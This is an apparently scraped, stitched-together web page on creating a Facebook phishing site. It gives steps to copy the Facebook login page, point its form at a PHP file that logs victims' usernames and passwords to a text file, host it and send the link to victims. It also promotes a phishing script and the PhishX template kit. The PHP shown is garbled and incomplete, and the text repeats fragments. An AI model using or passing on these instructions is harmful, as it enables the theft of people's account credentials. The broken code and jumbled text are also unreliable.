Create A Phishing Site Facebook

  1. Friends is a webhosting website. Here you can host your website. Step4; So you must first create an account at, then you will be allowed to upload your phishing page. Click on the link given below and you can singup.
  2. Facebook Phishing Script. Please dont use this script to hack someone's ID, I have created this script only to practice when I was learing php back in 2013. Edit doaction.php and replace YOUREMAILADDRESS with the email you want to recieve access. Upload it to a PHP supported web server. I am not recieving antything.
  3. There are ready-made templates to phishing and hack many of the popular websites like Twitter, Facebook, Instagram, Google, steam, Github, LinkedIn, Pinterest, and quora. Step 5) Phishing with Phishx The PhishX interface is easy to use and can be easily mastered with a couple of tries.

If you want to create phishing page for Facebook then open Then right click on mouse you will see a Option view source code then click on it Or you can directly press CTRL+U to see the source code Most of the people search for How To Create Your phishing page with android Mobile, there is no Source code viewer option so how to do. While phishing refers to creating the same webpage which looks like facebook login page, hosting that fake page on our server and sending the link to victim. So, when the victim opens the link they will see facebook page and when they log in on that fake page, we will get their email and password. Learn How To Hack Android Phone Using Kali Linux.


Phishing is the technique to create similar type of web-page of the existing web-page. Phishing is a type of attack where the intruders disguising as trustworthy agents attempt to gain your personal information such as passwords, credit card numbers or any other information.

Steps to Create Facebook Phishing Page:

  • Open facebook login page in your browser.
  • Press ctrl+U to find source code.
  • Copy whole source code and create a PHP file (index.php) and paste it.
  • Now, search for string methode='POST', it will give you two results first for login and second for register.
  • Next, replace the action file name as “xyz.php” in the login form.
  • Now create a file “xyz.php” and “log.txt” and paste below code in “xyz.php”.

    File name: xyz.php

    header ('Location:');
    // Open the text file in writing mode
    fwrite($file, $variable);
    fwrite($file, $value);
    fwrite($file, 'rn');
  • Now you are done, share the page and if anyone will enter username and password then it will save into log.txt file.
Create A Phishing Site FacebookPhishing

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Create A Phishing Site Facebook

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Phishing page for facebook

Phishing Page For Facebook

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Create A Phishing Site Facebook Login